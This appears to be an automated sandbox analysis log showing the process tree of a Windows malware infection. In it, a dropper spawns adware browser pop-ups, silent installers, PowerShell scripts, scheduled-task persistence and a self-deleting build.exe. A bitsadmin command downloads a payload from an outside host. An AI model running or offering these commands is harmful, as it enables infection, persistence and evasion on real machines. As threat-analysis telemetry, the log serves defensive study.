                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3144 /prefetch:1
                                                                                          9⤵
                                                                                            PID:5784
                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6452 /prefetch:1
                                                                                            9⤵
                                                                                              PID:3412
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5980 /prefetch:1
                                                                                              9⤵
                                                                                                PID:2204
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=32 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6636 /prefetch:1
                                                                                                9⤵
                                                                                                  PID:1608
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4176 /prefetch:1
                                                                                                  9⤵
                                                                                                    PID:4560
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=34 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6976 /prefetch:1
                                                                                                    9⤵
                                                                                                      PID:6292
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=35 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6164 /prefetch:1
                                                                                                      9⤵
                                                                                                        PID:5500
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=37 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6588 /prefetch:1
                                                                                                        9⤵
                                                                                                          PID:1396
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=38 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6124 /prefetch:1
                                                                                                          9⤵
                                                                                                            PID:2648
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=41 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5748 /prefetch:1
                                                                                                            9⤵
                                                                                                              PID:6840
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=42 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4128 /prefetch:1
                                                                                                              9⤵
                                                                                                                PID:6900
                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=45 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6480 /prefetch:1
                                                                                                                9⤵
                                                                                                                  PID:2568
                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=46 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7068 /prefetch:1
                                                                                                                  9⤵
                                                                                                                    PID:5404
                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=47 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1240 /prefetch:1
                                                                                                                    9⤵
                                                                                                                      PID:6196
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1844,12309761690634891108,8083861554834922323,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=48 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1508 /prefetch:1
                                                                                                                      9⤵
                                                                                                                        PID:4784
                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.profitabletrustednetwork.com/b1fsmdd9m?key=7e872dab99d78bffc4aa0c1e6b062dad
                                                                                                                      8⤵
                                                                                                                        PID:1684
                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a54718
                                                                                                                          9⤵
                                                                                                                            PID:5980
                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851483
                                                                                                                          8⤵
                                                                                                                            PID:3792
                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a54718
                                                                                                                              9⤵
                                                                                                                                PID:6916
                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?zoneid=1851513
                                                                                                                              8⤵
                                                                                                                                PID:6100
                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a54718
                                                                                                                                  9⤵
                                                                                                                                    PID:4552
                                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://www.directdexchange.com/jump/next.php?r=2087215
                                                                                                                                  8⤵
                                                                                                                                    PID:4992
                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x104,0x108,0x10c,0xe0,0x110,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a54718
                                                                                                                                      9⤵
                                                                                                                                        PID:3396
                                                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.directdexchange.com/jump/next.php?r=4263119
                                                                                                                                      8⤵
                                                                                                                                        PID:284
                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a54718
                                                                                                                                          9⤵
                                                                                                                                            PID:6852
                                                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument http://vexacion.com/afu.php?id=1294231
                                                                                                                                          8⤵
                                                                                                                                            PID:7008
                                                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.107 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.62 --initial-client-data=0x100,0x104,0x108,0xdc,0x10c,0x7fffd2a546f8,0x7fffd2a54708,0x7fffd2a54718
                                                                                                                                              9⤵
                                                                                                                                                PID:1436
                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\92-97740-3ca-03eac-420f6e3f85a38\Wofezhaxypi.exe
                                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\92-97740-3ca-03eac-420f6e3f85a38\Wofezhaxypi.exe"
                                                                                                                                            7⤵
                                                                                                                                              PID:1368
                                                                                                                                              • C:\Windows\System32\cmd.exe
                                                                                                                                                "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\bzacbeg1.gef\GcleanerEU.exe /eufive & exit
                                                                                                                                                8⤵
                                                                                                                                                  PID:4752
                                                                                                                                                  • C:\Users\Admin\AppData\Local\Temp\bzacbeg1.gef\GcleanerEU.exe
                                                                                                                                                    C:\Users\Admin\AppData\Local\Temp\bzacbeg1.gef\GcleanerEU.exe /eufive
                                                                                                                                                    9⤵
                                                                                                                                                      PID:908
                                                                                                                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 908 -s 260
                                                                                                                                                        10⤵
                                                                                                                                                        • Program crash
                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                        • Enumerates system info in registry
                                                                                                                                                        PID:6504
                                                                                                                                                  • C:\Windows\System32\cmd.exe
                                                                                                                                                    "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ed2vfb3v.i5a\installer.exe /qn CAMPAIGN="654" & exit
                                                                                                                                                    8⤵
                                                                                                                                                      PID:5760
                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\ed2vfb3v.i5a\installer.exe
                                                                                                                                                        C:\Users\Admin\AppData\Local\Temp\ed2vfb3v.i5a\installer.exe /qn CAMPAIGN="654"
                                                                                                                                                        9⤵
                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                        • Modifies system certificate store
                                                                                                                                                        • Suspicious use of FindShellTrayWindow
                                                                                                                                                        PID:2596
                                                                                                                                                        • C:\Windows\SysWOW64\msiexec.exe
                                                                                                                                                          "C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\AW Manager\Windows Manager 1.0.0\install\97FDF62\Windows Manager - Postback Y.msi" /qn CAMPAIGN=654 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\ed2vfb3v.i5a\installer.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\ed2vfb3v.i5a\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1634654358 /qn CAMPAIGN=""654"" " CAMPAIGN="654"
                                                                                                                                                          10⤵
                                                                                                                                                          • Enumerates connected drives
                                                                                                                                                          PID:6292
                                                                                                                                                    • C:\Windows\System32\cmd.exe
                                                                                                                                                      "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\s0ljyrt4.3nv\any.exe & exit
                                                                                                                                                      8⤵
                                                                                                                                                        PID:6044
                                                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\s0ljyrt4.3nv\any.exe
                                                                                                                                                          C:\Users\Admin\AppData\Local\Temp\s0ljyrt4.3nv\any.exe
                                                                                                                                                          9⤵
                                                                                                                                                            PID:1420
                                                                                                                                                        • C:\Windows\System32\cmd.exe
                                                                                                                                                          "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0vfrt1sj.1nh\gcleaner.exe /mixfive & exit
                                                                                                                                                          8⤵
                                                                                                                                                            PID:6464
                                                                                                                                                            • C:\Users\Admin\AppData\Local\Temp\0vfrt1sj.1nh\gcleaner.exe
                                                                                                                                                              C:\Users\Admin\AppData\Local\Temp\0vfrt1sj.1nh\gcleaner.exe /mixfive
                                                                                                                                                              9⤵
                                                                                                                                                                PID:6752
                                                                                                                                                                • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                  C:\Windows\SysWOW64\WerFault.exe -u -p 6752 -s 260
                                                                                                                                                                  10⤵
                                                                                                                                                                  • Program crash
                                                                                                                                                                  • Checks processor information in registry
                                                                                                                                                                  • Enumerates system info in registry
                                                                                                                                                                  PID:7052
                                                                                                                                                            • C:\Windows\System32\cmd.exe
                                                                                                                                                              "C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\nijehhbe.xun\autosubplayer.exe /S & exit
                                                                                                                                                              8⤵
                                                                                                                                                                PID:7124
                                                                                                                                                                • C:\Users\Admin\AppData\Local\Temp\nijehhbe.xun\autosubplayer.exe
                                                                                                                                                                  C:\Users\Admin\AppData\Local\Temp\nijehhbe.xun\autosubplayer.exe /S
                                                                                                                                                                  9⤵
                                                                                                                                                                  • Loads dropped DLL
                                                                                                                                                                  • Drops file in Program Files directory
                                                                                                                                                                  PID:6352
                                                                                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                    powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspA11.tmp\tempfile.ps1"
                                                                                                                                                                    10⤵
                                                                                                                                                                      PID:5804
                                                                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                      powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspA11.tmp\tempfile.ps1"
                                                                                                                                                                      10⤵
                                                                                                                                                                        PID:6656
                                                                                                                                                                      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                        powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspA11.tmp\tempfile.ps1"
                                                                                                                                                                        10⤵
                                                                                                                                                                          PID:5996
                                                                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                          powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspA11.tmp\tempfile.ps1"
                                                                                                                                                                          10⤵
                                                                                                                                                                            PID:912
                                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                            powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspA11.tmp\tempfile.ps1"
                                                                                                                                                                            10⤵
                                                                                                                                                                              PID:3252
                                                                                                                                                                            • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                              powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspA11.tmp\tempfile.ps1"
                                                                                                                                                                              10⤵
                                                                                                                                                                                PID:5776
                                                                                                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                powershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nspA11.tmp\tempfile.ps1"
                                                                                                                                                                                10⤵
                                                                                                                                                                                • Checks for any installed AV software in registry
                                                                                                                                                                                PID:6208
                                                                                                                                                                              • C:\Windows\SysWOW64\bitsadmin.exe
                                                                                                                                                                                "bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z
                                                                                                                                                                                10⤵
                                                                                                                                                                                • Download via BitsAdmin
                                                                                                                                                                                PID:3068
                                                                                                                                                                  • C:\Users\Admin\Pictures\Adobe Films\a1sIMMdcjuk0TWWU00B_mdKO.exe
                                                                                                                                                                    "C:\Users\Admin\Pictures\Adobe Films\a1sIMMdcjuk0TWWU00B_mdKO.exe"
                                                                                                                                                                    4⤵
                                                                                                                                                                    • Executes dropped EXE
                                                                                                                                                                    • Loads dropped DLL
                                                                                                                                                                    PID:5312
                                                                                                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                                                                                                      C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                                                                                                      5⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Loads dropped DLL
                                                                                                                                                                      • Adds Run key to start application
                                                                                                                                                                      PID:6084
                                                                                                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--loGQqfG2tg"
                                                                                                                                                                        6⤵
                                                                                                                                                                        • Loads dropped DLL
                                                                                                                                                                        PID:2728
                                                                                                                                                                        • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                          C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self --monitor-self-argument=--type=crashpad-handler "--monitor-self-argument=--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --monitor-self-argument=/prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x218,0x21c,0x220,0x1f4,0x224,0x7fffd258dec0,0x7fffd258ded0,0x7fffd258dee0
                                                                                                                                                                          7⤵
                                                                                                                                                                            PID:6176
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                              C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --no-periodic-tasks --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x13c,0x140,0x144,0x118,0x148,0x7ff60b0a9e70,0x7ff60b0a9e80,0x7ff60b0a9e90
                                                                                                                                                                              8⤵
                                                                                                                                                                                PID:4640
                                                                                                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                                                                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1704,12584540835772529798,4965942559173619970,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw2728_368073941" --mojo-platform-channel-handle=1720 /prefetch:8
                                                                                                                                                                              7⤵
                                                                                                                                                                                PID:7132
                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                        PID:3620
                                                                                                                                                                      • C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                                        schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Creates scheduled task(s)
                                                                                                                                                                        PID:2112
                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\wtMzR3Vvnv_QiztxLZ_MVD3l.exe
                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\wtMzR3Vvnv_QiztxLZ_MVD3l.exe"
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      • Suspicious use of SetThreadContext
                                                                                                                                                                      PID:2196
                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\wtMzR3Vvnv_QiztxLZ_MVD3l.exe
                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\wtMzR3Vvnv_QiztxLZ_MVD3l.exe"
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:3324
                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\7M7Hn4tZ95KaqTur0so4Bmsu.exe
                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\7M7Hn4tZ95KaqTur0so4Bmsu.exe"
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:1544
                                                                                                                                                                    • C:\Users\Admin\Pictures\Adobe Films\L69DfgFoAllVllEy2jOxVIeu.exe
                                                                                                                                                                      "C:\Users\Admin\Pictures\Adobe Films\L69DfgFoAllVllEy2jOxVIeu.exe"
                                                                                                                                                                      2⤵
                                                                                                                                                                      • Executes dropped EXE
                                                                                                                                                                      PID:1048
                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\build.exe
                                                                                                                                                                        "C:\Users\Admin\AppData\Local\Temp\build.exe"
                                                                                                                                                                        3⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Checks processor information in registry
                                                                                                                                                                        PID:5456
                                                                                                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                                          "C:\Windows\System32\cmd.exe" /c taskkill /im build.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\build.exe" & del C:\ProgramData\*.dll & exit
                                                                                                                                                                          4⤵
                                                                                                                                                                            PID:4852
                                                                                                                                                                            • C:\Windows\SysWOW64\taskkill.exe
                                                                                                                                                                              taskkill /im build.exe /f
                                                                                                                                                                              5⤵
                                                                                                                                                                              • Kills process with taskkill
                                                                                                                                                                              PID:1104
                                                                                                                                                                            • C:\Windows\SysWOW64\timeout.exe
                                                                                                                                                                              timeout /t 6
                                                                                                                                                                              5⤵
                                                                                                                                                                              • Delays execution with timeout.exe
                                                                                                                                                                              PID:1360
                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\yEIsgJfYOoWfBJEJNEoLkIc8.exe
                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\yEIsgJfYOoWfBJEJNEoLkIc8.exe"
                                                                                                                                                                        2⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        PID:4388
                                                                                                                                                                        • C:\Windows\SysWOW64\WerFault.exe
                                                                                                                                                                          C:\Windows\SysWOW64\WerFault.exe -u -p 4388 -s 256
                                                                                                                                                                          3⤵
                                                                                                                                                                          • Drops file in Windows directory
                                                                                                                                                                          • Program crash
                                                                                                                                                                          • Checks processor information in registry
                                                                                                                                                                          • Enumerates system info in registry
                                                                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                                                                          PID:2736
                                                                                                                                                                      • C:\Users\Admin\Pictures\Adobe Films\GrGMu1jtRUEKfTZWJK40WE4K.exe
                                                                                                                                                                        "C:\Users\Admin\Pictures\Adobe Films\GrGMu1jtRUEKfTZWJK40WE4K.exe"
                                                                                                                                                                        2⤵
                                                                                                                                                                        • Executes dropped EXE
                                                                                                                                                                        • Suspicious use of SetThreadContext
                                                                                                                                                                        PID:4788
